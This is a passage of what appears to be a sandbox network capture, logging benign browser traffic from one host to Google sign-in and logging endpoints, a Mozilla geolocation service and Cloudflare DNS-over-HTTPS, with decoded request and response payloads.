2024-07-26 15:58:01 UTC	520	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://accounts.google.com Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Max-Age: 86400 Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser Content-Type: text/plain; charset=UTF-8 Date: Fri, 26 Jul 2024 15:58:01 GMT Server: Playlog Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.5	61451	172.217.23.110	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:58:01 UTC	549	OUT	OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1 Host: play.google.com Connection: keep-alive Accept: / Access-Control-Request-Method: POST Access-Control-Request-Headers: x-goog-authuser Origin: https://accounts.google.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site Sec-Fetch-Dest: empty Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-26 15:58:01 UTC	520	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://accounts.google.com Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Max-Age: 86400 Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser Content-Type: text/plain; charset=UTF-8 Date: Fri, 26 Jul 2024 15:58:01 GMT Server: Playlog Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.5	61459	64.233.167.84	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:58:01 UTC	1299	OUT	GET /favicon.ico HTTP/1.1 Host: accounts.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=d4c1b36a-883c-4438-a92a-df6a48ab16ec,signin_mode=all_accounts,signout_mode=show_confirmation X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: __Host-GAPS=1:k7ycyzf5oH0xzIm_cMmIR9UG3Nc5ww:4KY7uW5rvtbqXLom
2024-07-26 15:58:02 UTC	1010	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 X-Frame-Options: DENY Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 26 Jul 2024 15:58:02 GMT Location: https://www.google.com/favicon.ico Strict-Transport-Security: max-age=31536000; includeSubDomains Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-mjNjs2dRq6BH2ssCqw38fg' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreport Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]} Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk" Content-Length: 243 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-26 15:58:02 UTC	243	IN	Data Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 21 2d 2d 20 47 53 45 20 44 65 66 61 75 6c 74 20 45 72 72 6f 72 20 2d 2d 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000">... GSE Default Error --><H1>Moved Temporarily</H1>The document has moved <A HREF="https://www.google.com/favicon.ico">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.5	61460	172.217.23.110	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:58:01 UTC	1132	OUT	POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 521 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" Content-Type: application/x-www-form-urlencoded;charset=UTF-8 sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" X-Goog-AuthUser: 0 sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://accounts.google.com X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-26 15:58:01 UTC	521	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 22 32 32 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 31 38 32 38 2c 5b 5b 22 31 37 32 32 30 30 39 34 37 39 35 36 35 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,"22",null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],1828,[["1722009479565",null,null,null
2024-07-26 15:58:02 UTC	925	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://accounts.google.com Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=516=KKCIN0jTcuHyZFqEmyqKY43JwEB1v8oVkpv1kk5ehd6xY8-Stp48blVJzhFTP3BHwCAJ4DARmXnSh8iTjBKrgF-paZUK43ce72PQQ54kgf58VpyCTZOtEovR8fPfFPD7WKzeB30ygU0GtyY66OYc3GIITWJwQXcEWEfD59SY9vU; expires=Sat, 25-Jan-2025 15:58:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Fri, 26 Jul 2024 15:58:02 GMT Server: Playlog Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Fri, 26 Jul 2024 15:58:02 GMT Connection: close Transfer-Encoding: chunked
2024-07-26 15:58:02 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-07-26 15:58:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.5	61463	172.217.23.110	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:58:02 UTC	1132	OUT	POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 521 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" Content-Type: application/x-www-form-urlencoded;charset=UTF-8 sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" X-Goog-AuthUser: 0 sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://accounts.google.com X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-26 15:58:02 UTC	521	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 22 32 32 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 31 38 32 38 2c 5b 5b 22 31 37 32 32 30 30 39 34 37 39 37 39 34 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,"22",null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],1828,[["1722009479794",null,null,null
2024-07-26 15:58:02 UTC	925	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://accounts.google.com Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=516=F-kS8n6n_CWSL8in4mxJzNcO5Glsx0KIXeRFy1g7jbXlOHzwtpelD_3ZQj2Ob7Apzn7LbzhHvhQRaH75Ag1mtADkSazdgMdjmDpge7ZJRIO9eJyJgaUht03mvbLGXr6WMZ_7j9ciAFSVH4JV1xjGIkmvhjGq7lhlQjsLyyXdFMg; expires=Sat, 25-Jan-2025 15:58:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Fri, 26 Jul 2024 15:58:02 GMT Server: Playlog Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Fri, 26 Jul 2024 15:58:02 GMT Connection: close Transfer-Encoding: chunked
2024-07-26 15:58:02 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-07-26 15:58:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.5	61488	172.217.23.110	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:58:06 UTC	1298	OUT	POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 933 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" Content-Type: text/plain;charset=UTF-8 sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" X-Goog-AuthUser: 0 sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://accounts.google.com X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=516=F-kS8n6n_CWSL8in4mxJzNcO5Glsx0KIXeRFy1g7jbXlOHzwtpelD_3ZQj2Ob7Apzn7LbzhHvhQRaH75Ag1mtADkSazdgMdjmDpge7ZJRIO9eJyJgaUht03mvbLGXr6WMZ_7j9ciAFSVH4JV1xjGIkmvhjGq7lhlQjsLyyXdFMg
2024-07-26 15:58:06 UTC	933	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 34 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 35 35 38 2c 5b 5b 22 31 37 32 32 30 30 39 34 37 33 30 30 30 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[4,0,0,0,0]]],558,[["1722009473000",null,null,null,
2024-07-26 15:58:06 UTC	930	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://accounts.google.com Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=516=Hgn-XOc6DswzOYzWI8EiiUFn6saMI94KOYJC2fsLdRZyf5K0Uty2D0nHQVe8wYWA16Hjl-QS6CeYOXYGdUQ1lPrPcfUkfrurnSWcSbNQQWOZdStF52pY9jcoB-GkTJUcKeG5c7g09wwgJafsgrX-OvYcTuUSXIz6Hbc_C1oOAFx8uCN6; expires=Sat, 25-Jan-2025 15:58:06 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Fri, 26 Jul 2024 15:58:06 GMT Server: Playlog Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Fri, 26 Jul 2024 15:58:06 GMT Connection: close Transfer-Encoding: chunked
2024-07-26 15:58:06 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-07-26 15:58:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.5	61524	35.190.72.216	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:58:21 UTC	338	OUT	GET /v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb HTTP/1.1 Host: location.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/json Connection: keep-alive
2024-07-26 15:58:21 UTC	324	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 15:58:21 GMT Content-Type: application/json Content-Length: 52 cache-control: max-age=0, no-cache, no-store, must-revalidate Strict-Transport-Security: max-age=31536000 Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-26 15:58:21 UTC	52	IN	Data Raw: 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 7d Data Ascii: {"country_code":"US","country_name":"United States"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.5	55792	172.64.41.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:58:28 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-07-26 15:58:28 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-07-26 15:58:28 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 26 Jul 2024 15:58:28 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8a9597645a738cc0-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 15:58:28 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1f 00 04 8e fa 50 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomP)

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.5	55791	172.64.41.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 15:58:28 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-07-26 15:58:28 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-07-26 15:58:28 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 26 Jul 2024 15:58:28 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8a9597648f4b0f5b-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 15:58:28 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 28 00 04 8e fa 50 23 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom(P#)

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.5	56210	64.233.167.84	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:00:58 UTC	1506	OUT	GET /v3/signin/_/AccountsSignInUi/gen204/?tmambps=0.00006616961789375582&rtembps=-1&rttms=82&ct=undefined HTTP/1.1 Host: accounts.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Chrome-ID-Consistency-Request: 